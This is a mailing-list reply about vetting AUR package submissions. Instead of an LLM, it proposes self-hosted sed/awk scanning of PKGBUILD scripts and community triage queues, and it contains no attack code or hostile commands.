Re: [Idea] AUR vetting process using LLM models

David C Rankin Sat, 30 May 2026 00:15:56 -0700

On 5/29/26 2:56 AM, [email protected] wrote:

Pretty good idea you got there, however there's a legitimate concern onwhere and how you are going to be running it.
For instance, which model to use? Gemini? Deepseek? Open-sourced ChatGPT?
Secondly, where are we gonna get the money for that? Donations areenough for everything up to this point, but running an LLM will shootcosts through the roof.I suggest either distilling or training a separate algorithm (**NOT** alanguage model) to keep costs low, as it won't be a generalist and wewon't be wasting RAM on storing parameters about medicine in a softwareproject.

That's a really good idea, and practical concerns. But, since PKGBUILDfiles are just bash scripts and we could probably suss-out a fairlyrigorous scan process given the brain-trust on this list, it may notrequire a frontier-model LLM or its cost.

Why not come up with a set of criteria, and turn those into sed, awk,etc. tests to capture suspicious submissions that could simply beself-hosted and run for each new account/submission. All a LLM is goingto do is take prompts that tell it to go put those things together andthen run it. (give or take). Some prompt wizard could go see what themodels will spit out when told to go generate an efficient set ofscripts to test the criteria, and see what it does.

A self-hosted tool that is 95% as good as a LLM with zero cost, thatscales, seems like the best of both worlds.

The second part of that is moderator or trusted user triage of anypositives identified. That has to scale as well (hopefully not toomuch), but we don't want to take the moderators away from the job theydo otherwise. Putting that out to the community in StackOverflow"Queues" type format may be an option to get member involvement and thatcould be open for users with X number of years/months without a lot oftrouble.

I don't mind helping either from a queue sense or tool standpoint, butwhat we need to do is start gathering together the criteria that needsto be checked, etc.. Starting with the postmortem from the recentattempts. I don't know how they would be integrated to run at the AURlevel, but I can turn criteria into testable script fragments to help.

Something similar could be done for AUR account/package ownershipchanges, adoptions, etc...

Focusing on the actual package-problem and eliminating the accountidentity baggage is a good idea, and a homegrown solution never a badchoice.



--
David C. Rankin, J.D.,P.E.

Re: [Idea] AUR vetting process using LLM models

Reply via email to